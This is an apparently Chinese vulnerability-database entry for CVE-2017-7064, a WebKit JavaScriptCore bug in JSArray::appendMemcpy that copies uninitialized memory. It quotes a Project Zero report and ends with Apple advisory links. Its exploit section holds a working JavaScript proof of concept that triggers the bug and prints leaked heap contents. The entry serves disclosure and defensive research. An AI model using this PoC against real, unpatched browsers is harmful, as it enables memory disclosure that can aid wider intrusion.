多款Apple产品WebKit 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1124127 漏洞类型 输入验证
发布时间 2017-07-25 更新时间 2017-07-25
CVE编号 CVE-2017-7064 CNNVD-ID CNNVD-201707-947
漏洞平台 Multiple CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/42375
https://cxsecurity.com/issue/WLB-2017070167
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201707-947
|漏洞详情
AppleiOS、iCloudforWindows、iTunesforWindows和Safari都是美国苹果(Apple)公司的产品。iTunesforWindows是一套基于Windows系统的媒体播放器应用程序;Safari是一款Web浏览器,是MacOSX和iOS操作系统附带的默认浏览器。WebKit是KDE社区开发的一套开源Web浏览器引擎,目前被AppleSafari及GoogleChrome等浏览器使用。多款Apple产品中的WebKit组件中存在安全漏洞。攻击者可借助特制的应用程序利用该漏洞绕过内存读取限制。以下产品和版本受到影响:AppleSafari10.1.2之前的版本;iOS10.3.3之前的版本;基于Windows平台的iCloud6.2.2之前的版本;基于Window平台的iTunes12.6.2之前的版本。
|漏洞EXP
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1236

WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy

Here's a snippet of JSArray::appendMemcpy.

bool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray)
{
    auto scope = DECLARE_THROW_SCOPE(vm);

    if (!canFastCopy(vm, otherArray))
        return false;

    IndexingType type = indexingType();
    IndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType());
    if (type == ArrayWithUndecided && copyType != NonArray) {
        if (copyType == ArrayWithInt32)
            convertUndecidedToInt32(vm);
        else if (copyType == ArrayWithDouble)
            convertUndecidedToDouble(vm);
        else if (copyType == ArrayWithContiguous)
            convertUndecidedToContiguous(vm);
        else {
            ASSERT(copyType == ArrayWithUndecided);
            return true;
        }
    } else if (type != copyType)
        return false;

    ...

    if (type == ArrayWithDouble)
        memcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength);
    else
        memcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength);

    return true;
}

The method considers the case where |this|'s type is ArrayWithUndecided, but does not consider whether |otherArray|'s type is ArrayWithUndecided that may have uninitialized data.
So, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this| which has a type.

PoC:
-->

function optNewArrayAndConcat() {
    let a = [,,,,,,,,,];
    return Array.prototype.concat.apply(a);
}

function main() {
    Array.prototype.constructor = {
        [Symbol.species]: function () {
            return [{}];
        }
    };

    gc();

    for (let i = 0; i < 0x10000; i++) {
        optNewArrayAndConcat().fill({});
    }

    gc();

    for (let i = 0; i < 0x20000; i++) {
        let res = optNewArrayAndConcat();
        if (res[0])
            print(res.toString());
    }
}

main();
|参考资料

来源:CONFIRM
链接:https://support.apple.com/HT207921
来源:CONFIRM
链接:https://support.apple.com/HT207923
来源:CONFIRM
链接:https://support.apple.com/HT207927
来源:CONFIRM
链接:https://support.apple.com/HT207928